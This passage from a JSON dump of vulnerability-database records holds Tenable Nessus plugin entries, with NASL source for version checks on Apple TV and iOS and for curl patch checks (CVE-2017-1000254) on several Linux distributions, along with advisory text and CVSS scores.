script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:11", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities (APPLE-SA-2017-12-13-6)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-13861", "CVE-2017-13860", "CVE-2017-7152", "CVE-2017-13874", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-7162", "CVE-2017-13879", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13876", "CVE-2017-13855", "CVE-2017-13865", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-7154"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700544.PRM", "href": "https://www.tenable.com/plugins/nnm/700544", "sourceData": "Binary data 700544.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:36:24", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_112_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/105075", "sourceData": "Binary data apple_ios_112_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T01:02:27", "description": "FTP PWD response parser out of bounds read\n\nlibcurl may read outside of a heap allocated buffer when doing FTP.\nWhen libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses. Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this has issue remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e7cb7), March 2005. In libcurl version 7.56.0, the parser always zero terminates the string but also rejects it if not terminated properly with a final double quote. (CVE-2017-1000254 )", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-11-06T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : curl (ALAS-2017-919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:curl", "p-cpe:/a:amazon:linux:curl-debuginfo", "p-cpe:/a:amazon:linux:libcurl", "p-cpe:/a:amazon:linux:libcurl-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-919.NASL", "href": "https://www.tenable.com/plugins/nessus/104393", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-919.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104393);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2017-1000254\");\n script_xref(name:\"ALAS\", value:\"2017-919\");\n\n script_name(english:\"Amazon Linux AMI : curl (ALAS-2017-919)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"FTP PWD response parser out of bounds read\n\nlibcurl may read outside of a heap allocated buffer when doing FTP.\nWhen libcurl connects to an FTP server and successfully logs in\n(anonymous or not), it asks the server for the current directory with\nthe `PWD` command. The server then responds with a 257 response\ncontaining the path, inside double quotes. The returned path name is\nthen kept by libcurl for subsequent uses. Due to a flaw in the string\nparser for this directory name, a directory name passed like this but\nwithout a closing double quote would lead to libcurl not adding a\ntrailing NUL byte to the buffer holding the name. When libcurl would\nthen later access the string, it could read beyond the allocated heap\nbuffer and crash or wrongly access data beyond the buffer, thinking it\nwas part of the path. A malicious server could abuse this fact and\neffectively prevent libcurl-based clients to work with it - the PWD\ncommand is always issued on new FTP connections and the mistake has a\nhigh chance of causing a segfault. The simple fact that this has issue\nremained undiscovered for this long could suggest that malformed PWD\nresponses are rare in benign servers. We are not aware of any exploit\nof this flaw. This bug was introduced in commit\n[415d2e7cb7](https://github.com/curl/curl/commit/415d2e7cb7), March\n2005. In libcurl version 7.56.0, the parser always zero terminates the\nstring but also rejects it if not terminated properly with a final\ndouble quote. (CVE-2017-1000254 )\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-919.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update curl' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libcurl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"curl-7.53.1-11.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"curl-debuginfo-7.53.1-11.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libcurl-7.53.1-11.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libcurl-devel-7.53.1-11.78.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl / curl-debuginfo / libcurl / libcurl-devel\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:34:25", "description": "According to the version of the curl packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - libcurl may read outside of a heap allocated buffer when doing FTP. When libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses.\n Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this has issue remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e 7cb7), March 2005. In libcurl version 7.56.0, the parser always zero terminates the string but also rejects it if not terminated properly with a final double quote.(CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : curl (EulerOS-SA-2017-1287)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:curl", "p-cpe:/a:huawei:euleros:libcurl", "p-cpe:/a:huawei:euleros:libcurl-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1287.NASL", "href": "https://www.tenable.com/plugins/nessus/104906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104906);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000254\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : curl (EulerOS-SA-2017-1287)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the curl packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - libcurl may read outside of a heap allocated buffer\n when doing FTP. When libcurl connects to an FTP server\n and successfully logs in (anonymous or not), it asks\n the server for the current directory with the `PWD`\n command. The server then responds with a 257 response\n containing the path, inside double quotes. The returned\n path name is then kept by libcurl for subsequent uses.\n Due to a flaw in the string parser for this directory\n name, a directory name passed like this but without a\n closing double quote would lead to libcurl not adding a\n trailing NUL byte to the buffer holding the name. When\n libcurl would then later access the string, it could\n read beyond the allocated heap buffer and crash or\n wrongly access data beyond the buffer, thinking it was\n part of the path. A malicious server could abuse this\n fact and effectively prevent libcurl-based clients to\n work with it - the PWD command is always issued on new\n FTP connections and the mistake has a high chance of\n causing a segfault. The simple fact that this has issue\n remained undiscovered for this long could suggest that\n malformed PWD responses are rare in benign servers. We\n are not aware of any exploit of this flaw. This bug was\n introduced in commit\n [415d2e7cb7](https://github.com/curl/curl/commit/415d2e\n 7cb7), March 2005. In libcurl version 7.56.0, the\n parser always zero terminates the string but also\n rejects it if not terminated properly with a final\n double quote.(CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1287\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19d470b4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected curl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libcurl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"curl-7.29.0-35.h13\",\n \"libcurl-7.29.0-35.h13\",\n \"libcurl-devel-7.29.0-35.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:34:34", "description": "This update for curl fixes the following security issues :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds read (bsc#1061876)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : curl (SUSE-SU-2017:3176-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:curl", "p-cpe:/a:novell:suse_linux:libcurl4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-3176-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104991", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3176-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104991);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000254\");\n\n script_name(english:\"SUSE SLES11 Security Update : curl (SUSE-SU-2017:3176-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for curl fixes the following security issues :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds\n read (bsc#1061876)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000254/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173176-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?85218492\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-curl-13361=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-curl-13361=1\n\nSUSE Linux Enterprise Server 11-SECURITY:zypper in -t patch\nsecsp3-curl-13361=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-curl-13361=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libcurl4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.19.7-1.70.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libcurl4-32bit-7.19.7-1.70.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"curl-7.19.7-1.70.8.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libcurl4-7.19.7-1.70.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:35:03", "description": "- fix out of bounds read in FTP PWD response parser (CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-10-18T00:00:00", "type": "nessus", "title": "Fedora 26 : curl (2017-601b4c20a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:curl", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-601B4C20A4.NASL", "href": "https://www.tenable.com/plugins/nessus/103895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-601b4c20a4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103895);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000254\");\n script_xref(name:\"FEDORA\", value:\"2017-601b4c20a4\");\n\n script_name(english:\"Fedora 26 : curl (2017-601b4c20a4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fix out of bounds read in FTP PWD response parser\n (CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-601b4c20a4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected curl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 